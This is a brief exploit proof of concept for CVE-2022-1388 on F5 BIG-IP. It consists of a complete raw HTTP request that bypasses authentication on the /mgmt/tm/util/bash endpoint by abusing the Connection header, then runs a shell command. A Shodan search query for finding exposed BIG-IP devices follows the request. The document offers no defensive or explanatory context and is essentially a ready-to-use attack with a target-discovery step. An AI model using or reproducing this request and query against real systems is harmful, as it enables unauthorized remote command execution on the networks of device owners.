CVE-2022-1388 EXPLOIT POC [F5 BIG IP]
POST /mgmt/tm/util/bash HTTP/1.1
Host: REDACTED:8083
Content-Length: 45
Connection: Keep-Alive,X-F5-Auth-Token
Cache-Control: max-age=0
X-F5-Auth-Token: SherlockSecure
Content-Type: application/json
Authorization: Basic YWRtaW46aG9yaXpvbjM=
{
"command":"run",
"utilCmdArgs":"-c id"
}
SHODAN QUERY
http.title:"BIG-IP®-+Redirect" +"Server"